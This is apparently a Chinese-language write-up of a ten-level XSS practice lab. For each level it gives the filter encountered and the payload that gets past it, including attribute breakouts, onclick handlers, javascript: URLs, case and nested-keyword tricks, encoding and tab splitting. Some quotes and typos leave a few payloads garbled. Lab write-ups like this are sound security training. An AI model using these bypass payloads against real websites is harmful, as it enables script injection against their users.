level1
没有任何过滤,直接URL后面加XSS测试语句
<script>alert('123')</script>;
弹窗
<script>alert('123')</script>;
level2
有搜索框,像第一关一样在搜索框测试一下,但是没有像第一关一样弹窗
查看源码发现我们的XSS语句被赋值给value并且在input标签里,所以我们需要闭合value和input标签就可以正常弹窗了
1"><script>alert('1');</script>
level3
转义了尖括号,这里可以用单引号闭合value但是没办法闭合input标签,但是可以注释掉标签然后用事件弹窗
1’ οnclick=alert(1)//
level4
跟第三关差不多,过滤了尖括号,用双引号闭合value然后注释掉标签用事件弹窗
1" οnclick=alert(1)//
level5
过滤了script和onclick标签,但是没过滤a标签
“><a href=” javascript:alert(1)"
level6
过滤了script,onclick,href,但是由于是用str_replace函数来过滤的,所以可以用大小写绕过
“><a HREF=” javascript:alert(1)"
level7
尝试了一下前面的payload,发现on,script,href关键字被屏蔽,但由于是直接替换为空,所以可以用单词嵌套来绕过
1" oonnclick=alert(1)//
level8
添加友情链接所以直接就有一个href标签,首先尝试了javascript:laert(1),
但是发现script被过滤了,然后尝试大小写绕过不行
最后用html实体编码绕过
javascript:alert(1)
level9
script被过滤,添加的url有验证合法性,没有带http://内则不合法,可以放在注释后面,通过tab制表符(%09)绕过对script的过滤
http://localhost/xss_test/level9.php?keyword=javascr%09ipt:alert(1)//http://
level10
有隐藏的form,尝试看能否注入
http://localhost/xss_test/level10.php?keyword=well done!&t_ilnk=" tyoe=“text” 1&t_history=" type=“text” 2&t_sort=" type=“text” 3
发现t_sort是可以注入的,于是用t_sort来弹窗
http://localhost/xss_test/level10.php?keyword=well done!&t_sort=" type=“text” οnclick="alert(1)